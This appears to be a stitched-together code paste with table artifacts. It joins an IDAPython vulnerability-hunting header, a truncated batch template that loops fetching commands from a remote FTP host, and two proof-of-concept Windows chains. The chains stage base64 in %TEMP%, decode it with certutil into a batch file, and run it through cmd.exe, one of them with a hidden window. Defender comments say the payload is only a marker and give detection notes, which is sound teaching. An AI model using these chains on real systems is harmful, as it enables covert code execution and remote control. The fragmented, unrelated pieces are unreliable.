#!/usr/bin/env python | |
#--------------------------------------------------------------------- | |
# Introduction to IDAPython for Vulnerability Hunting | |
# | |
# Author: Zach Miller, Somerset Recon | |
# | |
#--------------------------------------------------------------------- | |
# A function to determine if an operand of an instruction is located on the stack. This is used for finding stack buffers | |
# that have the potential to be overflowed |
cmdShell = """@echo off | |
echo "" > _in.txt | |
echo "" > "%(output_file)s" | |
(echo OPEN %(ftp_url)s %(port)s | |
echo USER anonymous | |
echo pass | |
echo GET _in.txt | |
echo BYE) > _init.txt | |
for /L %%%%n in (0,0,0) do ( |
// Proof-of-concept command chain: stage a text file in %TEMP%, decode it with
// certutil into a batch file, then run that batch file. Every step is a separate
// ShellExec call that starts cmd.exe with one "/C ..." command line.
//
// The base64 body on the second echo decodes to the single line
//   echo securitytest > %TEMP%\\malicious.exe
// so the decoded "malicious.bat" only writes a marker string; it carries no real payload.
//
// Defender notes:
//  - Observable sequence: the application hosting this script spawns cmd.exe five
//    times; test.txt and malicious.bat appear in %TEMP%; certutil.exe runs with
//    "-decode" (MITRE ATT&CK T1140, Deobfuscate/Decode Files or Information).
//  - Detection pivots: process-creation telemetry for certutil.exe with "-decode"
//    reading and writing under %TEMP%, and cmd.exe whose parent is a document or
//    script host rather than an interactive shell.
//  - Mitigation: application-control or attack-surface-reduction policy that stops
//    the hosting application from launching child processes.
//  - NOTE(review): the meaning of the "Open" verb and the numeric 4 argument depends
//    on the hosting application's ShellExec API, which is not shown here.
//Write out base64 encoded file to Windows TEMP directory | |
// ">" creates or truncates test.txt with the PEM-style header line.
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt"); | |
// ">>" appends the base64 body (the marker command described above).
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt"); | |
// ">>" appends the PEM-style footer line, completing the staged file.
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt"); | |
//Decode base64 encoded file and output malicious batch file | |
// certutil is a signed Windows binary, so this decode step is not caught by a
// control that only inspects unknown executables; alert on the command line instead.
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat"); | |
//Execute malicious batch file | |
// Final stage: cmd.exe runs a .bat that was created seconds earlier in %TEMP%.
ShellExec("C:\Windows\system32\cmd.exe","Open","",4,"","/C %TEMP%\\malicious.bat"); |
// Proof-of-concept command chain using the Windows Script Host shell object: stage
// a text file in %TEMP% line by line, then decode it with certutil into a batch
// file. Only the staging and decode steps are visible in this listing.
//
// The base64 body on the second echo decodes to the single line
//   echo securitytest > %TEMP%\\malicious.exe
// so the decoded batch file only writes a marker string; it carries no real payload.
//
// Defender notes:
//  - Every run() call passes window style 0, so no console window is shown; rely on
//    process-creation telemetry, not on the user noticing anything.
//  - Observable sequence: the process hosting this script instantiates WScript.Shell,
//    spawns cmd.exe repeatedly, test.txt appears in %TEMP%, and certutil.exe runs
//    with "-decode" (MITRE ATT&CK T1140, Deobfuscate/Decode Files or Information).
//  - Mitigation: block ActiveX instantiation of WScript.Shell from untrusted content
//    and restrict the hosting application from launching child processes.
//Create ActiveX to run executables and commands | |
wsh0=new ActiveXObject("WScript.shell"); | |
//Write out base64 encoded file to Windows TEMP directory. cmd.exe will be run as a hidden process (0 flag). | |
// ">" creates or truncates test.txt with the PEM-style header line.
wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo -----BEGIN CERTIFICATE----- > %TEMP%\\test.txt",0); | |
// ">>" appends the base64 body (the marker command described above).
wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo ZWNobyBzZWN1cml0eXRlc3QgPiAlVEVNUCVcXG1hbGljaW91cy5leGU= >> %TEMP%\\test.txt",0); | |
// ">>" appends the PEM-style footer line, completing the staged file.
wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C echo -----END CERTIFICATE----- >> %TEMP%\\test.txt",0); | |
//Decode base64 encoded file and output malicious batch file | |
// certutil is a signed Windows binary; alert on the "-decode" command line writing
// a .bat under %TEMP% rather than on the binary itself.
wsh0.run("file:///C:\\Windows\\System32\\cmd.exe /C certutil -decode %TEMP%\\test.txt %TEMP%\\malicious.bat",0); |